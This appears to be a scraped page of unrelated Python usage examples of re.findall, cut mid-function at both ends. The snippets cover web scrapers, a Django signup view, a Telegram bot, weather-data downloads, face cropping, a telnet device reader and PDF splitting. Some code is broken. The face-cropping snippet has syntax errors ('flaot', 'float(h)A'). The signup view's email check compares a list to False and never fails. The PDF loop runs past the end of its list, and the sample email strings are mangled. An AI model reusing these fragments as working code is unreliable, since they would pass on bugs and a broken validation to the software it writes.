                            tv_di = '其他'
                        try:
                            info.append(lg[tv_di])
                        except KeyError as e:
                            info.append('')
                        try:
                            lei_s = re.findall(
                                '</a></li><li>类型:<a(.*?)</li><li>', html_s,
                                re.S)[0]
                            dan_lei = re.findall('target="_blank">(.*?)</a>',
                                                 lei_s, re.S)
                            z_lei = ''
                            for aa in dan_lei:
                                z_lei += aa
                            info.append(z_lei)
                        except IndexError as e:
                            info.append('')
                        if info[2] != '':
                            movies = Movies(moviesname=info[1],
                                            moviessource='优酷视频',
                                            moviesgrade=info[3],
                                            movieslanguage=info[6],
                                            moviestype=info[7],
                                            moviesdecade=info[4],
                                            moviesregion=info[5],
                                            pdatetime=info[4],
                                            moviesimageurl=info[2],
                                            moviesurl='https:' + info[0],
                                            moviesurl2='[]')
                            movies.save()
                            print(
                                '成功的添加一条信息+++++++++++++++++++++++++++++++++++++++++++++++++++'
                            )
                        else:
                            print(
                                '数据失败.............................................................'
                            )
                        # print(info[:10])
                    elif len(Movies.objects.filter(moviesname=info[1])) >= 1:
                        print(
                            '已经添加本条信息!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'
                        )
                        print(info)
                    else:
                        print(
                            '已经添加本条信息!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'
                        )
                        print(info)
                info.clear()
Beispiel #47
0
def dload_grib_files(grib_files, tropo_model='ERA5', snwe=None):
    """Download weather re-analysis grib files using PyAPS
    Parameters: grib_files : list of string of grib files
    Returns:    grib_files : list of string
    """
    print(
        '\n------------------------------------------------------------------------------'
    )
    print('downloading weather model data using PyAPS ...')

    # Get date list to download (skip already downloaded files)
    grib_files_exist = check_exist_grib_file(grib_files, print_msg=True)
    grib_files2dload = sorted(list(set(grib_files) - set(grib_files_exist)))
    date_list2dload = [
        str(re.findall('\d{8}', i)[0]) for i in grib_files2dload
    ]
    print('number of grib files to download: %d' % len(date_list2dload))
    print(
        '------------------------------------------------------------------------------\n'
    )

    # Download grib file using PyAPS
    if len(date_list2dload) > 0:
        hour = re.findall('\d{8}[-_]\d{2}',
                          grib_files2dload[0])[0].replace('-',
                                                          '_').split('_')[1]
        grib_dir = os.path.dirname(grib_files2dload[0])

        # try 3 times to download, then use whatever downloaded to calculate delay
        i = 0
        while i < 3:
            i += 1
            try:
                if tropo_model in ['ERA5', 'ERAINT']:
                    pa.ECMWFdload(date_list2dload,
                                  hour,
                                  grib_dir,
                                  model=tropo_model,
                                  snwe=snwe,
                                  flist=grib_files2dload)

                elif tropo_model == 'MERRA':
                    pa.MERRAdload(date_list2dload, hour, grib_dir)

                elif tropo_model == 'NARR':
                    pa.NARRdload(date_list2dload, hour, grib_dir)
            except:
                if i < 3:
                    print(
                        'WARNING: the {} attampt to download failed, retry it.\n'
                        .format(i))
                else:
                    print('\n\n' + '*' * 50)
                    print(
                        'WARNING: downloading failed for 3 times, stop trying and continue.'
                    )
                    print('*' * 50 + '\n\n')
                pass

    # check potentially corrupted files
    grib_files = check_exist_grib_file(grib_files, print_msg=False)
    return grib_files
Beispiel #48
0
def calculate_delay_timeseries(inps):
    """Calculate delay time-series and write it to HDF5 file.
    Parameters: inps : namespace, all input parameters
    Returns:    tropo_file : str, file name of ECMWF.h5
    """
    def get_dataset_size(fname):
        atr = readfile.read_attribute(fname)
        shape = (int(atr['LENGTH']), int(atr['WIDTH']))
        return shape

    # check existing tropo delay file
    if (ut.run_or_skip(out_file=inps.tropo_file,
                       in_file=inps.grib_files,
                       print_msg=False) == 'skip'
            and get_dataset_size(inps.tropo_file) == get_dataset_size(
                inps.geom_file)):
        print(
            '{} file exists and is newer than all GRIB files, skip updating.'.
            format(inps.tropo_file))
        return

    # prepare geometry data
    geom_obj = geometry(inps.geom_file)
    geom_obj.open()
    inps.dem = geom_obj.read(datasetName='height')
    inps.inc = geom_obj.read(datasetName='incidenceAngle')

    if 'latitude' in geom_obj.datasetNames:
        # for dataset in geo OR radar coord with lookup table in radar-coord (isce, doris)
        inps.lat = geom_obj.read(datasetName='latitude')
        inps.lon = geom_obj.read(datasetName='longitude')
    elif 'Y_FIRST' in geom_obj.metadata:
        # for geo-coded dataset (gamma, roipac)
        inps.lat, inps.lon = ut.get_lat_lon(geom_obj.metadata)
    else:
        # for radar-coded dataset (gamma, roipac)
        inps.lat, inps.lon = ut.get_lat_lon_rdc(geom_obj.metadata)

    # calculate phase delay
    length, width = int(inps.atr['LENGTH']), int(inps.atr['WIDTH'])
    num_date = len(inps.grib_files)
    date_list = [str(re.findall('\d{8}', i)[0]) for i in inps.grib_files]
    tropo_data = np.zeros((num_date, length, width), np.float32)
    print(
        '\n------------------------------------------------------------------------------'
    )
    print(
        'calcualting absolute delay for each date using PyAPS (Jolivet et al., 2011; 2014) ...'
    )
    print('number of grib files used: {}'.format(num_date))

    if not inps.verbose:
        prog_bar = ptime.progressBar(maxValue=num_date)
    for i in range(num_date):
        grib_file = inps.grib_files[i]
        tropo_data[i] = get_delay(grib_file, inps)

        if not inps.verbose:
            prog_bar.update(i + 1, suffix=os.path.basename(grib_file))
    if not inps.verbose:
        prog_bar.close()

    # remove metadata related with double reference
    # because absolute delay is calculated and saved
    for key in ['REF_DATE', 'REF_X', 'REF_Y', 'REF_LAT', 'REF_LON']:
        if key in inps.atr.keys():
            inps.atr.pop(key)

    # Write tropospheric delay to HDF5
    ts_obj = timeseries(inps.tropo_file)
    ts_obj.write2hdf5(data=tropo_data, dates=date_list, metadata=inps.atr)
    return inps.tropo_file
Beispiel #49
0
def signup(request):
    if request.method == 'POST':
        username = request.POST['username']
        password1 = request.POST['password']
        password2 = request.POST['repassword']
        email = request.POST['email']
        phone = request.POST['phone']
        address = request.POST['address']
        city = request.POST['city']

        try:
            prime = request.POST['prime']
            if prime == "on":
                prime = True
        except:
            prime = False
        state = request.POST['state']
        image = request.FILES['image']

        if User.objects.filter(username=username).exists():
            messages.error(request, 'Username already taken')
            return redirect('/user/signup/')

        elif re.findall(r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$",
                        email) == False:
            messages.error(request, 'Invalid Email')
            return redirect('/user/signup')

        elif User.objects.filter(email=email).exists():
            messages.error(request, "Email already taken")
            return redirect('/user/signup/')

        elif phone.isnumeric() == False:
            messages.error(request, "Invalid phone number")
            return redirect('/user/signup/')

        elif city.isalnum() == True and city.isalpha() == False:
            messages.error(request, "Invalid city name")
            return redirect('/user/signup/')

        elif password1 != password2:
            messages.error(request, "Password not matched")
            return redirect('/user/signup/')
        else:
            user = User.objects.create_user(username=username,
                                            password=password1,
                                            email=email)
            new_cust = Client.objects.create(user=user,
                                             phone=phone,
                                             address=address,
                                             city=city,
                                             prime=prime,
                                             state=state,
                                             image=image)
            new_cust.save()
            messages.info(request, "You have been added successfully !!")
            auth.login(request, user)
            return redirect("/")

    else:
        return render(request, 'signup.html')
Beispiel #50
0
def process_command(inputs, message):
    if message.get("text") is not None:
        if message.get("text").startswith("/"):
            # SERVICE MAINTENANCE CHECK
            if function_switch == "OFF":
                print("Service down for maintenance")
                return inputs["serviceDown"]

            print("Current request json {}".format(message))
            command_raw = message.get("text")
            bot_index_identifier = command_raw.find('@')
            if bot_index_identifier != -1:
                if command_raw[bot_index_identifier+1:] != telegram_bot_name:
                    print("Not a command for Amaze bot, input command {}".format(command_raw[bot_index_identifier+1:]))
                    raise ValueError()
                command_raw = command_raw[:bot_index_identifier]
            print("Found a new interaction with amaze bot for message: {}".format(command_raw))
            if inputs and command_raw in inputs:
                # authenticate command permission
                if not is_command_permitted(command_raw, message):
                    print("User not permitted for the command {}".format(command_raw))
                    return inputs["commandNotPermitted"]
                result_command = inputs[command_raw]
                print("Found resultCommand {}".format(result_command))
                command_keyword = re.findall("##.+##", result_command)
                if len(command_keyword) != 0:
                    print("Processing regex {} for result command {}".format(command_keyword[0], result_command))
                    try:
                        return result_command.replace(command_keyword[0], "\n" +
                                                      format_command(inputs, message, command_keyword[0]))
                    except Exception as err:
                        return str(err)
                else:
                    return result_command
            else:
                print("Didn't find resultCommand for {}".format(command_raw))
                message["text"] = "/help"
                return inputs["default"], process_command(inputs, message)
        else:
            # SERVICE MAINTENANCE CHECK
            if function_switch == "OFF":
                print("Service down for maintenance")
                raise ValueError("Unable to handle operation")

            issue_number = re.findall("#\d{4}|#\d{3}", message.get("text"))
            if len(issue_number) != 0:
                print("Current request json {}".format(message))
                print("Found request for issue number {}".format(issue_number[0]))
                return git.parse_issue(issue_number[0][1:])
            elif message.get("text").startswith("## Issue explanation (write below this line)"):
                reporter_from = message.get("from")
                user_name = reporter_from.get("username")
                print("Found reporter {}, message {}".format(reporter_from, message.get("text")))
                return inputs["createissue"].format(git.create_issue(issue_create_uri, issue_token, message.get("text"), user_name))
            else:
                print("Unable to handle operation for chat id {}".format(message.get("chat").get("id")))
                raise ValueError("Unable to handle operation")
    elif message.get("new_chat_member"):
        # SERVICE MAINTENANCE CHECK
        if function_switch == "OFF":
            print("Service down for maintenance")
            raise ValueError("Unable to handle operation")
        print("Current request json {}".format(message))
        print("New member added to group: {}".format(message.get("new_chat_member")))
        return inputs["member"].format(message.get("new_chat_member").get("first_name")), inputs["member2"]
Beispiel #51
0
def get_code():
    r = requests.get('https://www.tianyancha.com/', headers=headers)
    code = re.findall(
        r'https://static.tianyancha.com/fonts-styles/css/(.*?)/font.css',
        r.text)[0]
    return code
Beispiel #52
0
def get_kernel(kernels_raw):
    for kernel in re.findall(
            r"kernel.*?\s+(\S+)\s+\S+",
            kernels_raw, re.MULTILINE):
        yield kernel
for video in folders:
    images = os.listdir(os.getcwd() + '/' + str(video))
    current_path = os.getcwd() + "/" + str(video)
    for i in images:
        image_file_name = current_path + "/" + i
        img = cv2.imread(image_file_name, 0)
        faces = face_cascade.detectMultiScale(img, 1.3, 5)
        print(faces)
        t_h,t_w = img.shape
        for f in faces:
            x, y, w, h = [ v for v in f ]
            #drop face if it is smaller than 40 px
            if w < 40 or h < 40:
                continue
            #drop face if face relatively too small in screen
            if True and (float(w)/flaot(t_w) <ratio or float(h)A/float(t_h)<ratio):
                continue
            cv2.rectangle(img, (x,y), (x+w,y+h), (255,255,255))
            sub_face = img[y:y+h, x:x+w]

            resize_face = cv2.resize(sub_face, (48, 48))
            resize_face = cv2.equalizeHist(resize_face)

            id = re.findall(r'\d+', str(i))[0]

            face_file_name = current_path + "/" + str(id) + "face.jpg"
            cv2.imwrite(face_file_name, resize_face)
            print("saved" + face_file_name)

        #remove image file
        #os.remove(image_file_name) ##uncomment to clean !
import re

pattern = r'[^@ ]+@[^@]+\.[^@]{3}'
com = re.compile(pattern)
string = '[email protected] [email protected] Raj@gmail [email protected]'
obj = re.findall(pattern, string)
if obj:
    print(obj)
else:
    print("no match found")
Beispiel #55
0
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 18:17:41 2020

@author: kisku
"""

import re

"""
a. digit at the beginning of the string and a digit at the end of the string
b. A string that contains only whitespace characters or word characters
c. A string containing no whitespace characters """


# to find digit in begining and end of string.
re.findall(r"(?<!\d)\d+(?!\d)", text)

# to find string that contains only whitespace characters or word characters.
re.findall(r"[\w\s]*",text)

# string containing no whitespace characters
re.findall(r"[^\W]*",text)
Beispiel #56
0
os.chdir("L:\MitchumLab\Individual Lab Folders\XunliangLiu\CLAVATA_project\Infection_BIK_WT_2")
def filetype(fn):
	if '.' in fn:
		return fn.split('.')[-1]
	else:
		print (fn, "is not a file name!")
		return -1
	
	
for root, dirs, files in os.walk('.'):
  for f in files:
    fext = filetype(f).lower() if filetype(f) != -1 else next
    
    if fext == 'tif' or fext == 'tiff':
      ## use 2-digit for plate# instand of 1-digit
      if re.findall("R\dP\d[A,B,C]\dT\d",f):
        newfn = "P0".join(f.split('P'))
        os.rename(root + '/' + f, root + '/' + newfn)
        print ("!!! Rename... ", f, "to", newfn)
      
      ## if file name end with '_', add a number at the end
      if f.split('.')[-2][-1] == '_':
        s=1
        while True:
          jnt = '_' + str(s)
          newfn = jnt.join(f.split('_'))
          if not newfn in files: # if file name already exist, file# add 1
            os.rename(root + '/' + f, root + '/' + newfn)
            break
          print ("filename ", newfn, "exist")
          s = s+1
Beispiel #57
0
 def command_get_output(self):
     self.__command_output_list = []
     tn = self.__tn
     # 输入CTRL+Z前退出到原始状态
     tn.write(b'\32\n')
     try:
         # 暴力进入sysmode,思科华为的命令都输进去,无论什么设备百分百进入。
         # 尝试登录sysmod,输入登录命令
         tn.write(('system-view' + "\n").encode('utf-8'))
         # 输入enable命令
         tn.write((self.__enable_command + "\n").encode('utf-8'))
     except:
         pass
     # 输入命令以获取网络设备的sysmodtag
     tn.write(self.__command_output_more_input_command.encode('utf-8'))
     # 等1秒待命令输出
     time.sleep(1)
     #print(tn.read_very_eager())
     sysmodtag = (re.findall(
         r'#|]',
         tn.read_very_eager().decode('utf-8'))[0]).encode('utf-8')
     print('!!!!!!!!!!!!', 'sysmodtag is:', sysmodtag, '!!!!!!!!!!!!!!')
     tn.write(self.__command_output_more_input_command.encode('utf-8'))
     # 提示输入的命令
     print('Input command:', self.__command_input)
     # 输入命令
     tn.write((self.__command_input + '\n').encode('utf-8'))
     # 将输入命令的返回值赋值response,命令返回值前两个输出不是期望的返回值而是空值
     #time.sleep(0.5)
     response = tn.read_very_eager()
     #print('########', response, '##############')
     # 将输入命令的返回值赋值response,如果sysmodtag在response则表示命令输出完整,否则输入命令获取完整的命令
     while sysmodtag not in response:
         # 命令返回值未完结时,输入继续输出命令获取值的命令
         tn.write(self.__command_output_more_input_command.encode('utf-8'))
         # 获取命令返回值并赋值给response, 用response捕获命令结束提示
         #response = tn.read_until(self.__command_output_more_tag_prompt, timeout=0.5)
         response = tn.read_very_eager()
         # print('@@@@@@@@@@@@@@@@@', response, '@@@@@@@@@@@@@@@')
         # 将获取命令返回值赋值给response_format
         response_format = response
         # 将response_format重新编码
         response_format = response_format.decode('utf-8')
         # print(response_format)
         # 将response_format格式化
         response_format = re.sub(r'-- \x08.*\x08', '', response_format)
         response_format = re.sub(r'          ', '',
                                  response_format)
         response_format = re.sub(r'\s----.*16D', '', response_format)
         response_format = re.sub(r'.*16D\s*.*16D', '', response_format)
         response_format = re.sub(r' ----', '', response_format)
         response_format = re.sub(r'                ', '', response_format)
         response_format = re.split(r'\r\n', response_format)
         # 删除命令的返回值中对于的无效返回值
         for item in response_format:
             if self.__command_output_more_tag_prompt.decode(
                     'utf-8') in item:
                 response_format.remove(item)
         # 将输入命令的返回值添加到列表
         for item in response_format:
             print(item)
             self.__command_output_list.append(item)
         time.sleep(1)
         # 提示正在获取命令返回值
         # print(response_format)
         # print('Getting command output, please wait.',  n, 'lines command output had gotten.')
     # 获取完整的命令输出后提示完成
     print('All command output had gotten!!!')
     # 这些代码没用了,但是先留着可能有用
     #else:
     #    print(2229)
     #    response_format = response
     #    print(response_format)
     #    response_format = response_format.decode('utf-8')
     #    response_format = re.split(r'\r\n', response_format)
     #    for item in response_format:
     #        print(item)
     # 这些代码没用了,但是先留着可能有用
     # 删除无效的多余的非命令返回值
     for item in self.__command_output_list:
         if self.__command_output_more_tag_prompt.decode('utf-8') in item:
             self.__command_output_list.remove(item)
     return self.__command_output_list
Beispiel #58
0
	def f(self):

		for i in range(0,1000,100):

			if (int(self.maxP.encode('utf-8'))<=i):
				pageSize = i
				break

		n_papers= 0                      #to count normalized papers.
		sum_citations= 0  
		counter = 0   
		ncounter = 0
		acounter= 0
		bcounter= 0            # to count total numbers citations an author recieved. 

	#{ looping trough pages to get all the publications
		for j in range(0,pageSize, 100):

			S_url=self.url + "&cstart=" + str(j) +"&pagesize=100"

			with urllib.request.urlopen(S_url) as my_url:

				page_html = my_url.read()
			
			page_soup = soup(page_html, "html.parser")

			if (j == 0):
				Name= page_soup.find('div', {'id': 'gs_prf_in'})


			aTag = page_soup.findAll('td', {'class': 'gsc_rsb_std'})

			Titles = page_soup.findAll('td', {'class': 'gsc_a_t'})

			Citations_soup = page_soup.findAll('td', {'class': 'gsc_a_c'})

			Years = page_soup.findAll('td', {'class': 'gsc_a_y'})

			info_page = page_soup.findAll('a', {'class' : 'gsc_a_at'})

			authors_soup= page_soup.findAll('div', {'class': 'gs_gray'})

		#{ loop to get all the pop up urls and then collect number of co-authors from there
			for author in info_page:

				Author_names_link = author["data-href"]

				user=Author_names_link[53:65]


				n_input=Author_names_link[-12:]

				n_author_url="https://scholar.google.com.au/citations?user="******"&hl=en#d=gs_md_cita-d&u=%2Fcitations%3Fview_op%3Dview_citation%26hl%3Den%26user%3D"+user+"%26citation_for_view%3D"+user+"%3A"+n_input+"%26tzom%3D-330"
				N_author_url.append(n_author_url)

			less_authors_name=[]
			for a in authors_soup:
				less_authors_name.append(a.text)

			for i in range(0, len(less_authors_name), 2):
				author_names_list.append(less_authors_name[i])


			for title in Titles:
				Title = title.a.text
				x=Title.encode('utf-8')
				title_list.append(x.decode('utf-8', 'ignore'))
				#title_list has all the titles
			
			for c in Citations_soup:
				p= c.text.encode('utf-8')
				r=p.decode('utf-8', 'ignore')
				q= re.findall('[0-9]+',r)
				Citations.append(q)

		n_author_names_list= []

		for j in author_names_list:
			if '...' not in j:
				n_author_names_list.append(author_names_list[counter])
				counter+=1
				continue
			else:
				n_author_names_list.append('#')
				url_to_counter.append(counter)
				counter+= 1

		if len(url_to_counter) != 0:
			driver= webdriver.Firefox()
			driver.implicitly_wait(0.2)
			for url in url_to_counter:
				print (url)
				print (N_author_url[url])
				driver.get(N_author_url[url])
				time.sleep(0.5)
				title= driver.find_elements_by_xpath('//div[@class="gsc_vcd_value"]')
				page_element = title[0].text
				print (page_element)
				coAuths.append(len(page_element.split(',')))
			driver.quit()

		for name in n_author_names_list:
			if (name=='#'):
				number_of_coauths.append(coAuths[acounter])
				acounter+=1
			else:
				number_of_coauths.append(len(name.split(',')))

		for entry in Citations:
			try:
				newCitations.append(entry[0])
			except:
				newCitations.append(0)
					#newCitations has all the citations as a list



		
		for element in range(len(title_list)):
			n_papers +=1/number_of_coauths[element]

			n_citations.append(int(int(newCitations[element])/number_of_coauths[element]))

		for k in newCitations:
			try:
				sum_citations+= int(k[0])
			except:
				continue

		#print ('a', title_list)
		#print('b', newCitations)
		#print('c', number_of_coauths)
		#print('d', n_citations)
		#print('e', int(n_papers))
		#print('f', int(sum(n_citations)))
		#print('g', int(sum(n_citations)/ len(title_list)))


		
		for entity in range(len(title_list)):
			a= Author(Title_name= title_list[entity], Citations=newCitations[entity], 
				CoAuthors= number_of_coauths[entity], Normalized_citations= n_citations[entity]
				)
			a.save()

		normalized_papers= int(n_papers)
		total_normalized_citations= int(sum(n_citations))
		#normalized_h_index= int(sum(n_citations)/len(title_list))

		nn_citations= n_citations[0:normalized_papers]
		nn_citations.sort(reverse= True)

		for i in nn_citations:
			ncounter+= 1
			print (ncounter, i)
			if(ncounter> i):
				normalized_h_index= ncounter-1
				break




		return (normalized_papers, total_normalized_citations, normalized_h_index)
Beispiel #59
0
def get_external_ip():
    url = 'http://checkip.dyndns.org'
    requesty = urllib.request.urlopen(url).read().decode('utf-8')
    externalIP = re.findall('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}', requesty)
    return externalIP
    pdf_merger.append(firstpdf)
    pdf_merger.merge(insertpage, secondpdf)
    # # 添加书签
    # pdf_merger.addBookmark('这是一个书签', 1)
    pdf_merger.write('merge_pdf.pdf')

#
# def split_by_num(filename, nums, password=None):
filename = r'F:\研一下\量化投资资料\量化教材\Hands-On_Machine_Learning_for_Algorithmic_Trading.pdf'
pdf_reader = PdfFileReader(open(filename, mode='rb' ))
pages = pdf_reader.getNumPages()
outline = pdf_reader.getOutlines()
outlinchapter = []
outlinepage = [i+18 for i in [8,33,65,88,119,147,175,224,260,284,312,351,389,418,441,458]]
for o in outline:
    res = re.findall(r"'/Title': '(.*?)', '/Page': IndirectObject\((.*?), 0\)",str(o),re.S)
    if 'Chapter' in res[0][0]:
        outlinchapter.append(res[0][0])
#print(list(outlinedict[0].keys())[0],list(outlinedict[0].values())[0])
outlinedict =[{i[0]:i[1]} for i in zip(outlinchapter,outlinepage)]


for i in range(len(outlinedict)+1):
    pdf_writer = PdfFileWriter()
    split_pdf_name = list(outlinedict[i].keys())[0].replace(':','') + '.pdf'
    start = list(outlinedict[i].values())[0]
    end = list(outlinedict[i+1].values())[0]
    print(split_pdf_name)
    for i in range(int(start), int(end)):
        pdf_writer.addPage(pdf_reader.getPage(i))
    with open(split_pdf_name,'wb') as out: